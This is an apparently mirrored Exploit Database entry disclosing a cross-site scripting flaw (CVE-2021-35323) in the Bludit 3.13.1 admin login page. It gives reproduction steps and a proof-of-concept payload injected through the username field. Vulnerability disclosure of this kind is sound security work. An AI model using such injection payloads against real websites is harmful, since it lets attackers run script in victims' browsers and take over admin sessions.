Bludit 3.13.1 – ‘username’ Cross Site Scripting (XSS)

• Exploit Database
• 37 阅读

• 作者： Vasu
  日期： 2021-11-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50529/

• # Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
  # Date: 19/10/2021
  # Exploit Author: Vasu (tamilan_mkv)
  # Vendor Homepage: https://www.bludit.com
  # Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
  # Version: bludit-3-13-1
  # Tested on: kali linux
  # CVE : CVE-2021-35323
  
  ### Steps to reproduce
  
  1. Open login page http://localhost:800/admin/login;
  2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password
  3. Trigger the malicious javascript code